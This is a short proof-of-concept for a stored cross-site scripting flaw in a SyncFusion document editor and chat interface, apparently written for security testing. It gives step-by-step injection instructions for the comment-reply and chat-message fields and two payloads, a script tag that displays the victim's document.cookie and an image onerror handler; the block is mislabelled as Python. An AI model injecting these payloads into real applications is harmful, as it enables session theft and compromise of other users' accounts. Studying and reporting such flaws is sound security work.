The following code is for security research and authorized testing only.
python
<!-- PoC for SyncFusion Document-Editor / Chat-UI Stored XSS -->
<!-- Step 1: Login with a valid user account -->
<!-- Step 2: Navigate to Document-Editor or Chat-UI -->
<!-- Step 3: Inject the following payload into the 'Reply to comment' field or 'Chat message' input -->
<script>
// Simple proof of concept to execute JavaScript in victim's browser
alert('XSS Vulnerability Verified: ' + document.cookie);
</script>
<!-- Alternative Payload (Image based) -->
<img src=x onerror=alert('XSS Triggered')>